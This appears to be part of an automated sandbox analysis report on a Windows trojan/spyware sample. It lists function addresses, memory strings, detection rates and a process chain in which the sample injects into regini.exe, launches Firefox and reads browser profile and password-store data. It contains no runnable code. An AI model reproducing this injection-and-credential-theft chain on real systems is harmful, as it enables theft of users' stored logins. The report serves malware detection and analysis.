                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E29550 NtReadFile,7_2_02E29550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E29850 NtAllocateVirtualMemory,7_2_02E29850
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395F149 NtReadVirtualMemory,7_2_0395F149
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395F0E6 NtReadVirtualMemory,7_2_0395F0E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395F795 NtClose,7_2_0395F795
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_00BC42180_2_00BC4218
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_00BC6F920_2_00BC6F92
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_00BCD4240_2_00BCD424
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_069A0FF80_2_069A0FF8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_069A0FE80_2_069A0FE8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072725E00_2_072725E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07278B980_2_07278B98
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072742200_2_07274220
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07272A180_2_07272A18
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07274AF80_2_07274AF8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072721A80_2_072721A8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004188E35_2_004188E3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004101035_2_00410103
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00402A725_2_00402A72
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00416ADE5_2_00416ADE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00416AE35_2_00416AE3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00402A805_2_00402A80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040E3035_2_0040E303
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004103235_2_00410323
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040E4475_2_0040E447
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040E4535_2_0040E453
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040256A5_2_0040256A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004025705_2_00402570
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0042EED35_2_0042EED3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00402F505_2_00402F50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016181585_2_01618158
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015801005_2_01580100
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162A1185_2_0162A118
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016481CC5_2_016481CC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016441A25_2_016441A2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016501AA5_2_016501AA
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016220005_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164A3525_2_0164A352
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016503E65_2_016503E6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F05_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016302745_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016102C05_2_016102C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015905355_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016505915_2_01650591
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016424465_2_01642446
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016344205_2_01634420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163E4F65_2_0163E4F6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B47505_2_015B4750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015907705_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158C7C05_2_0158C7C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AC6E05_2_015AC6E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A69625_2_015A6962
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0165A9A65_2_0165A9A6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A05_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159A8405_2_0159A840
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015928405_2_01592840
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE8F05_2_015BE8F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015768B85_2_015768B8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164AB405_2_0164AB40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01646BD75_2_01646BD7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA805_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159AD005_2_0159AD00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162CD1F5_2_0162CD1F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158ADE05_2_0158ADE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A8DBF5_2_015A8DBF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590C005_2_01590C00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580CF25_2_01580CF2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630CB55_2_01630CB5
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01604F405_2_01604F40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01632F305_2_01632F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0F305_2_015B0F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D2F285_2_015D2F28
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582FC85_2_01582FC8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159CFE05_2_0159CFE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160EFA05_2_0160EFA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590E595_2_01590E59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164EE265_2_0164EE26
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164EEDB5_2_0164EEDB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2E905_2_015A2E90
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164CE935_2_0164CE93
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0165B16B5_2_0165B16B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157F1725_2_0157F172
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C516C5_2_015C516C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159B1B05_2_0159B1B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F0E05_2_0164F0E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016470E95_2_016470E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015970C05_2_015970C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163F0CC5_2_0163F0CC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157D34C5_2_0157D34C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164132D5_2_0164132D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D739A5_2_015D739A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016312ED5_2_016312ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AB2C05_2_015AB2C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015952A05_2_015952A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016475715_2_01647571
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162D5B05_2_0162D5B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015814605_2_01581460
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F43F5_2_0164F43F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F7B05_2_0164F7B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D56305_2_015D5630
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016416CC5_2_016416CC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015999505_2_01599950
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AB9505_2_015AB950
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016259105_2_01625910
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FD8005_2_015FD800
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015938E05_2_015938E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FB765_2_0164FB76
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01605BF05_2_01605BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015CDBF95_2_015CDBF9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AFB805_2_015AFB80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01603A6C5_2_01603A6C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01647A465_2_01647A46
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FA495_2_0164FA49
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163DAC65_2_0163DAC6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01631AA35_2_01631AA3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162DAAC5_2_0162DAAC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D5AA05_2_015D5AA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01647D735_2_01647D73
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01593D405_2_01593D40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01641D5A5_2_01641D5A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AFDC05_2_015AFDC0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01609C325_2_01609C32
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FCF25_2_0164FCF2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FF095_2_0164FF09
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01591F925_2_01591F92
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FFB15_2_0164FFB1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01599EB05_2_01599EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FA3527_2_036FA352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364E3F07_2_0364E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037003E67_2_037003E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E02747_2_036E0274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036C02C07_2_036C02C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036C81587_2_036C8158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036301007_2_03630100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DA1187_2_036DA118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F81CC7_2_036F81CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F41A27_2_036F41A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037001AA7_2_037001AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036D20007_2_036D2000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036407707_2_03640770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036647507_2_03664750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363C7C07_2_0363C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365C6E07_2_0365C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036405357_2_03640535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037005917_2_03700591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F24467_2_036F2446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E44207_2_036E4420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EE4F67_2_036EE4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FAB407_2_036FAB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F6BD77_2_036F6BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363EA807_2_0363EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036569627_2_03656962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036429A07_2_036429A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0370A9A67_2_0370A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364A8407_2_0364A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036428407_2_03642840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0366E8F07_2_0366E8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036268B87_2_036268B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B4F407_2_036B4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03682F287_2_03682F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03660F307_2_03660F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E2F307_2_036E2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364CFE07_2_0364CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03632FC87_2_03632FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036BEFA07_2_036BEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03640E597_2_03640E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FEE267_2_036FEE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FEEDB7_2_036FEEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03652E907_2_03652E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FCE937_2_036FCE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364AD007_2_0364AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DCD1F7_2_036DCD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363ADE07_2_0363ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03658DBF7_2_03658DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03640C007_2_03640C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03630CF27_2_03630CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E0CB57_2_036E0CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0362D34C7_2_0362D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F132D7_2_036F132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0368739A7_2_0368739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E12ED7_2_036E12ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365B2C07_2_0365B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036452A07_2_036452A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0367516C7_2_0367516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0362F1727_2_0362F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0370B16B7_2_0370B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364B1B07_2_0364B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F70E97_2_036F70E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF0E07_2_036FF0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EF0CC7_2_036EF0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036470C07_2_036470C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF7B07_2_036FF7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F16CC7_2_036F16CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F75717_2_036F7571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DD5B07_2_036DD5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036314607_2_03631460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF43F7_2_036FF43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFB767_2_036FFB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B5BF07_2_036B5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0367DBF97_2_0367DBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365FB807_2_0365FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B3A6C7_2_036B3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFA497_2_036FFA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F7A467_2_036F7A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EDAC67_2_036EDAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DDAAC7_2_036DDAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03685AA07_2_03685AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E1AA37_2_036E1AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036499507_2_03649950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365B9507_2_0365B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036D59107_2_036D5910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036AD8007_2_036AD800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036438E07_2_036438E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFF097_2_036FFF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFFB17_2_036FFFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03641F927_2_03641F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03649EB07_2_03649EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F7D737_2_036F7D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03643D407_2_03643D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F1D5A7_2_036F1D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365FDC07_2_0365FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B9C327_2_036B9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFCF27_2_036FFCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E120407_2_02E12040
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0CF107_2_02E0CF10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B2607_2_02E0B260
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B2547_2_02E0B254
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0D1307_2_02E0D130
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B1107_2_02E0B110
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E156F07_2_02E156F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E138EB7_2_02E138EB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E138F07_2_02E138F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E2BCE07_2_02E2BCE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395E2777_2_0395E277
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395D6D87_2_0395D6D8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395E60C7_2_0395E60C
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03687E54 appears 102 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015C5130 appears 58 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 0160F290 appears 105 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015FEA12 appears 86 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 0157B970 appears 280 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015D7E54 appears 102 times
                Source: BcF3o0Egke.exe, 00000000.00000002.2242593729.0000000004EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2245210352.0000000006BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2239473750.0000000003539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2239473750.0000000003539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000000.2074263028.000000000015A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGpHAn.exe> vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2238343244.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000005.00000002.2441681061.000000000167D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREGINI.EXEj% vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exeBinary or memory string: OriginalFilenameGpHAn.exe> vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@10/10
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BcF3o0Egke.exe.logJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exeFile created: C:\Users\user\AppData\Local\Temp\7046-nn1KJump to behavior
                Source: BcF3o0Egke.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BcF3o0Egke.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: regini.exe, 00000007.00000002.3935086502.0000000003161000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2637354633.0000000003134000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3935086502.0000000003134000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3935086502.000000000313F000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2637247739.0000000003113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BcF3o0Egke.exeVirustotal: Detection: 70%
                Source: BcF3o0Egke.exeReversingLabs: Detection: 95%
                Source: unknownProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: kernel.appcore.dllJump to behavior
